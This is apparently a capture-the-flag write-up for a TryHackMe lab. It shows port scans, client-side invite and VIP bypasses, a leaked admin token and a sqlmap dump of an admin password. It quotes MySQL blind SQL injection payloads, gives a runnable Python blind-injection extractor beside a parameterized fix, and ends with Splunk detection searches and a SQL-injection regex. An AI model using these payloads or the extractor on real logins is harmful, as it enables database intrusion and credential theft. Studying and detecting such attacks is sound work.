Exploitation

Port scanning

└─# nmap --min-rate=10000 -p- hackme.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-31 03:39 UTC
Nmap scan report for hackme.thm (10.10.68.180)
Host is up (0.0051s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
8089/tcp open unknown
8191/tcp open limnerpressure
40009/tcp open unknown
MAC Address: 02:3F:0B:D7:B0:DF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.53 seconds
└─# nmap -sV -sT -sC -Pn -p22,80,8000,8089,8191,40009 hackme.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-31 03:42 UTC
Nmap scan report for hackme.thm (10.10.68.180)
Host is up (0.00034s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9904368a9e0d3624fed8971fb18c1401 (RSA)
| 256 38f61ec97035a36f6b813607b357d690 (ECDSA)
|_ 256 21ea7824538f3106219105c6eb8994f1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Hack3M | Cyber Security Training
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open http Splunkd httpd
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://hackme.thm:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http Splunkd httpd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2024-04-05T11:00:59
|_Not valid after: 2027-04-05T11:00:59
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
8191/tcp open limnerpressure?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Type: text/plain
| Content-Length: 85
|_ looks like you are trying to access MongoDB over HTTP on the native driver port.
40009/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.93%I=7%D=5/31%Time=6659474D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
MAC Address: 02:3F:0B:D7:B0:DF (Unknown)
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.33 seconds

We need an invite code. The page source references an invite.js:

function e() {
    var e = window.location.hostname;
    if (e === "capture3millionsubscribers.thm") {
        // Only on this hostname does the page ask the server for the code
        var o = new XMLHttpRequest;
        o.open("POST", "inviteCode1337HM.php", true);
        o.onload = function() {
            if (this.status == 200) {
                console.log("Invite Code:", this.responseText)
            } else {
                console.error("Error fetching invite code.")
            }
        };
        o.send()
    } else if (e === "hackme.thm") {
        // The gate is purely client-side: nothing but the hostname string differs
        console.log("This function does not operate on hackme.thm")
    } else {
        console.log("Lol!! Are you smart enought to get the invite code?")
    }
}

If the current hostname is capture3millionsubscribers.thm, the page calls inviteCode1337HM.php, so add that name to /etc/hosts pointing at the target.

Then call the e function from the browser console:

e()

which prints Invite Code: VkXgo:Invited30MnUsers

Submitting the invite code yields a set of credentials:

guest@hackme.thm:wedidit1010

Log in with them. In the browser storage there is an "isVIP" cookie; setting it to "true" makes the VIP room reachable, but clicking "Start Machine" pops up an alert saying we are not a VIP user. Look at the page source:

// sc-drFUgV fXEjrf
$(document).ready(function() {
    $('#start_machine').click(function(e) {
        // The VIP decision is taken in the browser from a DOM element's value;
        // the server is never consulted, so the check can be flipped client-side
        var isVIPE = document.getElementById("isVIP");
        var isVIP = (isVIPE.value.toLowerCase() === 'true');
        if (isVIP) {
            // Swap class names to reveal the machine pane
            $("#splitScreenRight").attr("class", "sc-drFUgV bROZdw");
            $("#main1").attr("class", "sc-bKNmIE bYiuLB");
            $("#main2").attr("class", "sc-hZDbVM bksodH");
            $("#nav1").attr("class", "sc-krITIZ gMgnKr");
        } else {
            alert("This page is only for VIP users")
        }
    });
});

$(document).ready(function() {
    $('#exit_split').click(function(e) {
        // Restore the original class names to close the split view
        $("#splitScreenRight").attr("class", "sc-drFUgV fXEjrf");
        $("#main1").attr("class", "sc-bKNmIE ipXaXG");
        $("#main2").attr("class", "sc-hZDbVM hgVIhb");
        $("#nav1").attr("class", "sc-krITIZ hoLoqS");
    });
});

So we still are not VIP. The source also references a path, BBF813FA941496FCE961EBA46D754FF3.php

Visiting it gives a web shell page. Most commands are blocked, but ls and cat still work.

config.php reveals the admin panel location and its access token:

<?php

$SECURE_TOKEN= "ACC#SS_TO_ADM1N_P@NEL";

$urlAdminPanel= "http://admin1337special.hackme.thm:40009";

?>

Add a hosts entry for admin1337special.hackme.thm and visit it: the root returns 403, but the login page is reachable at:

http://admin1337special.hackme.thm:40009/public/html/login

Entering the TOKEN gets us to a login form. We have no credentials for it, so just throw sqlmap at the captured request:

└─$ sqlmap -r 1 --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.8.2#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:29:38 /2024-05-31/

[05:29:38] [INFO] parsing HTTP request from '1'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[05:29:38] [INFO] resuming back-end DBMS 'mysql'
[05:29:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON username ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"username":"1' AND EXTRACTVALUE(2170,CASE WHEN (2170=2170) THEN 2170 ELSE 0x3A END)-- qTbc","password":"1"}

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: {"username":"1' AND GTID_SUBSET(CONCAT(0x716b717171,(SELECT (ELT(1533=1533,1))),0x717a787671),1533)-- tEwu","password":"1"}

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"username":"1' AND (SELECT 8282 FROM (SELECT(SLEEP(5)))ECeH)-- NigY","password":"1"}
---
[05:29:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[05:29:39] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[05:29:39] [INFO] fetching current database
[05:29:39] [INFO] retrieved: 'hackme'
[05:29:39] [INFO] fetching tables for database: 'hackme'
[05:29:40] [INFO] retrieved: 'config'
[05:29:40] [INFO] retrieved: 'users'
[05:29:40] [INFO] fetching columns for table 'users' in database 'hackme'
[05:29:41] [INFO] retrieved: 'id'
[05:29:41] [INFO] retrieved: 'int'
[05:29:41] [INFO] retrieved: 'username'
[05:29:42] [INFO] retrieved: 'varchar(50)'
[05:29:42] [INFO] retrieved: 'password'
[05:29:43] [INFO] retrieved: 'varchar(255)'
[05:29:43] [INFO] retrieved: 'email'
[05:29:44] [INFO] retrieved: 'varchar(100)'
[05:29:44] [INFO] retrieved: 'name'
[05:29:45] [INFO] retrieved: 'varchar(300)'
[05:29:45] [INFO] retrieved: 'role'
[05:29:45] [INFO] retrieved: 'varchar(20)'
[05:29:46] [INFO] retrieved: 'status'
[05:29:46] [INFO] retrieved: 'varchar(100)'
[05:29:46] [INFO] fetching entries for table 'users' in database 'hackme'
[05:29:47] [INFO] retrieved: 'Admin User'
[05:29:48] [INFO] retrieved: 'admin'
[05:29:48] [INFO] retrieved: '1'
[05:29:50] [INFO] retrieved: 'admin@hackme.thm'
[05:29:50] [INFO] retrieved: '1'
[05:29:50] [INFO] retrieved: 'adminisadm1n'
[05:29:51] [INFO] retrieved: 'admin'
Database: hackme
Table: users
[1 entry]
+----+------------------+------------+--------+----------+--------------+----------+
| id | email | name | role | status | password | username |
+----+------------------+------------+--------+----------+--------------+----------+
| 1 | admin@hackme.thm | Admin User | admin | 1 | adminisadm1n | admin |
+----+------------------+------------+--------+----------+--------------+----------+
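The dump above comes from a boolean/error-based blind injection in the JSON username field. Below is a runnable model of what sqlmap automated, added here as an example and not part of the original writeup: the admin panel's PHP/MySQL backend is stood in for by an in-memory SQLite table seeded with the one row from the dump, the vulnerable string-concatenated query sits beside its parameterized fix, and a small extractor recovers the admin password one character at a time through nothing but the login's true/false answer. The EXTRACTVALUE and GTID_SUBSET payloads sqlmap used are MySQL-specific; the SUBSTR-based payload here is the portable form of the same idea. Function names and the SQLite schema are this example's own assumptions.

```python
"""Boolean-based blind SQL injection against the JSON login, as a runnable
model.  Added example, not part of the original writeup: the target's
PHP/MySQL backend is stood in for by an in-memory SQLite database seeded with
the single row sqlmap dumped, so everything here runs offline.  sqlmap's
EXTRACTVALUE/GTID_SUBSET payloads are MySQL-specific; the SUBSTR-based
payload below is the portable form of the same true/false extraction."""
import json
import sqlite3
import string

# Constructed copy of the hackme.users table, one row as in the sqlmap dump.
_db = sqlite3.connect(":memory:")
_db.execute(
    "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
    "email TEXT, name TEXT, role TEXT, status TEXT)"
)
_db.execute(
    "INSERT INTO users VALUES (1, 'admin', 'adminisadm1n', 'admin@hackme.thm', "
    "'Admin User', 'admin', '1')"
)


def login_vulnerable(body: str) -> bool:
    """Model of the admin-panel login: JSON fields are pasted into the SQL
    string, so a quote in `username` ends the literal and the rest is SQL."""
    data = json.loads(body)
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (data["username"], data["password"]))
    return _db.execute(sql).fetchone() is not None


def login_fixed(body: str) -> bool:
    """Same lookup with bound parameters: the input is only ever data."""
    data = json.loads(body)
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = _db.execute(sql, (data["username"], data["password"])).fetchone()
    return row is not None


def extract_blind(oracle, query, charset=string.ascii_letters + string.digits,
                  max_len=64):
    """Recover the scalar result of `query` one character at a time through a
    login that only answers true/false, which is what sqlmap's boolean-based
    blind technique automates.  The injected condition short-circuits the
    WHERE clause with OR and comments out the password check.  SQLite compares
    strings byte-wise, so a plain = per character is enough; MySQL's default
    collations are case-insensitive, which is why sqlmap compares ORD() values."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = "' OR SUBSTR((%s),%d,1)='%s'-- " % (query, pos, ch)
            body = json.dumps({"username": payload, "password": "1"})
            if oracle(body):
                result += ch
                break
        else:
            break  # no candidate matched: SUBSTR returned '', end of value
    return result


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE username='admin'"
    print("vulnerable login leaks:", extract_blind(login_vulnerable, target))
    print("fixed login leaks:     ", repr(extract_blind(login_fixed, target)))
```

Against login_vulnerable the extractor walks out adminisadm1n with at most 62 requests per character; against login_fixed every probe is a failed login and it returns an empty string, which is the whole difference between the two query builders.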

After logging in, choose Sign Up and add one more user, which brings the count to 3M.

Back on the port 80 site, the flag is shown.

Detection

Log in to Splunk with the credentials.

In Search, use index=* to cover every index and set the time range to "All time": 10530 events in total.

Searching the user_agent field turns up sqlmap, confirming the attacker used sqlmap, from source IP 83.45.212.17:

index=* source_ip="83.45.212.17" 

Not every event from that IP is part of the attack, so filter further. The actual attack events are the sqlmap requests plus the manual SQL injection attempts:

index=* user_agent="sqlmap/1.2.4#stable (http://sqlmap.org)" | regex _raw="(\b(SELECT|UNION|INSERT|DELETE|UPDATE)\b|['\";\\-\\-])" | table _time, host, src_ip, uri, _raw

158 attack events in total.

Reading the manual SQL injection payloads reveals the table name TryHack3M_users.
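The Splunk searches above do three things: pivot on an indicator (the sqlmap User-Agent or the source IP), flag SQL syntax in the request with a regex, and read table names out of the payloads. The following is a stand-alone Python model of that triage, added as an example and not part of the original writeup. The events are constructed to carry the fields Splunk extracted (src_ip, user_agent, uri); the attacker IP, the sqlmap User-Agent string and the EXTRACTVALUE payload are taken from the writeup, while the benign events and the manual UNION payload naming TryHack3M_users are invented for the demonstration. It also goes one step beyond the page's query: keying on the source IP rather than the User-Agent keeps manual injections sent with a browser User-Agent, and a tighter regex drops the matches the page's bare quote/hyphen class produces on ordinary URIs.

```python
"""Splunk-style triage of the SQL injection traffic as stand-alone Python.
Added example, not part of the original writeup: the events below are
constructed to carry the fields Splunk extracted (src_ip, user_agent, uri);
the attacker IP, the sqlmap User-Agent and the EXTRACTVALUE payload are taken
from the writeup, the remaining events and the manual payload are invented."""
import json
import re
from urllib.parse import unquote

# Constructed events, one JSON object per line as Splunk would index them.
SAMPLE_LOG = r'''
{"_time":"2024-05-31T05:29:38","host":"hackme","src_ip":"10.10.68.1","user_agent":"Mozilla/5.0","uri":"/en-US/account/login"}
{"_time":"2024-05-31T05:29:39","host":"hackme","src_ip":"83.45.212.17","user_agent":"sqlmap/1.2.4#stable (http://sqlmap.org)","uri":"/robots.txt"}
{"_time":"2024-05-31T05:29:40","host":"hackme","src_ip":"83.45.212.17","user_agent":"sqlmap/1.2.4#stable (http://sqlmap.org)","uri":"/public/html/login?username=1%27%20AND%20EXTRACTVALUE(2170%2CCASE%20WHEN%20(2170%3D2170)%20THEN%202170%20ELSE%200x3A%20END)--%20qTbc&password=1"}
{"_time":"2024-05-31T05:29:41","host":"hackme","src_ip":"83.45.212.17","user_agent":"Mozilla/5.0","uri":"/public/html/login?username=admin%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20TryHack3M_users--%20-&password=1"}
{"_time":"2024-05-31T05:29:42","host":"hackme","src_ip":"10.10.68.1","user_agent":"Mozilla/5.0","uri":"/search?q=rock%27n%27roll"}
'''

SQLMAP_UA = "sqlmap/1.2.4#stable (http://sqlmap.org)"
ATTACKER_IP = "83.45.212.17"

# The regex from the Splunk search: SQL keywords, or any quote, semicolon or
# hyphen.  The single characters make it noisy on ordinary URIs (/en-US/, rock'n'roll).
PAGE_RE = re.compile(r"""\b(?:SELECT|UNION|INSERT|DELETE|UPDATE)\b|['";-]""")
# Tighter variant: keywords, a quote followed by a boolean operator, or an SQL
# comment terminator, which is the shape of every payload sqlmap listed.
TIGHT_RE = re.compile(r"""\b(?:SELECT|UNION|INSERT|DELETE|UPDATE)\b|'\s*(?:AND|OR)\b|--\s""", re.I)


def load_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decoded_uri(event):
    """Payloads arrive percent-encoded; match on the decoded form."""
    return unquote(event["uri"])


def naive_query(events):
    """index=* | regex _raw=... with no User-Agent filter: shows the false positives."""
    return [e for e in events if PAGE_RE.search(decoded_uri(e))]


def page_query(events):
    """The writeup's search: sqlmap User-Agent first, then the SQL-syntax regex."""
    return [e for e in events
            if e["user_agent"] == SQLMAP_UA and PAGE_RE.search(decoded_uri(e))]


def attacker_query(events, src_ip=ATTACKER_IP):
    """Pivot on the source IP instead of the User-Agent, so manual injections
    sent from a browser are kept while recon requests like /robots.txt are not."""
    return [e for e in events
            if e["src_ip"] == src_ip and TIGHT_RE.search(decoded_uri(e))]


def table_names(events):
    """Pull identifiers that follow FROM in the injected SQL."""
    names = set()
    for e in events:
        names.update(re.findall(r"\bFROM\s+([A-Za-z_]\w*)", decoded_uri(e), re.I))
    return names


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    print("regex alone:   ", len(naive_query(evs)), "events")
    print("page query:    ", len(page_query(evs)), "events")
    print("by attacker IP:", len(attacker_query(evs)), "events")
    print("tables named:  ", table_names(attacker_query(evs)))
```

On the five constructed events the bare regex flags four (two of them benign, matched only on a hyphen or an apostrophe), the page's User-Agent-gated search keeps one sqlmap probe, and the IP pivot keeps that probe plus the browser-sent UNION query, from which the FROM scan yields TryHack3M_users.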